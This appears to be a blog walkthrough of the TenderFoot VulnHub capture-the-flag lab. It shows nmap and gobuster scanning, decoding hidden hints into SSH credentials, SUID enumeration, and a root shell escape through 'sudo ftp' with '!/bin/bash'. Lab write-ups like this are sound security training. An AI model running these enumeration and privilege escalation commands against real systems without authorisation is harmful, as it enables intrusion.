In this post, we are going to solve another Vunhub machine called TenderFoot. This another boot-2-root challenge you can download from Vulnhub.
Network Scanning
Let’s start with network scanning, discovering the target IP address.
1 |
sudo netdiscover |
Now we have the target machine IP address and our next step is scanning the machine IP and find out open ports and running services.
1 |
sudo nmap -A -p- 192.168.43.187 |
We have only two ports open target machine 22/SSH and 80/HTTP running Apache httpd service.
Enumeration
Let’s explore the IP in the browser.
After navigating the target machine IP we saw the apache2 ubuntu web page and we see a hint we need to run the directory enumeration tool.
Let’s run the gobuster to discover server hidden files and web pages.
1 2 3 |
wordlist="/opt/seclists/Discovery/Web-Content/directiry-list-2.3-big.txt gobuster dir -u http://192.168.43.187 -w $wordlist -x .php,.txt,.js,/,.html |
we found many hidden directors let’s open every director in the browser to find some useful information.
1 2 3 |
http://192.168.43.187/entry.js http://192.168.43.187/fotocd |
first, we open the entry.js in this web page we saw the name monica and next we open the fotocd directory here we found brainfuck encoded string.
we decode brainfuck encoded string online at <sange.fi> and output give a hint for ssh login and here we found base64 encoded string let’s decode it.
and decode output is $99990$, Since we found a username monica let’s try to login with the ssh server using the credentials.
1 |
ssh monica@192.168.43.187 |
Now we log in with Monica user and target user home directory we found our first flag. let’s start enumerating finding some useful information.
1 2 |
ls cat user1.txt |tail -n 9 |
Privilege Escalation
without wasting our time, we execute the find command to obtain a list of binaries that we have SUID permission.
1 |
find / -type f -perm -u=s 2>/dev/null |
We found a custom made binary file let’s execute the command. and our current user is changed to chandler user.
1 2 3 |
/opt/exec/chandler cd /home/chandler ls -la |
We already login with chandler user but we haven’t much more permission, again we enumerate the target home directory and we found a base64 encoded key.
1 2 3 |
cd .cache/ ls cat note.txt |
we decode the key and we found another password, first, we try this password for root user login but we fail to login with the root user then we try this password for chandler and we successfully change our current user.
1 2 |
su chandler sudo -l |
again we check the sudo permission and our current user can run the FTP command with sudo permission, Let’s run the privilege escalation command.
1 2 3 4 5 |
sudo ftp !/bin/bash cd /root ls cat proof.txt |
Money Heist Vulnhub Walkthrough link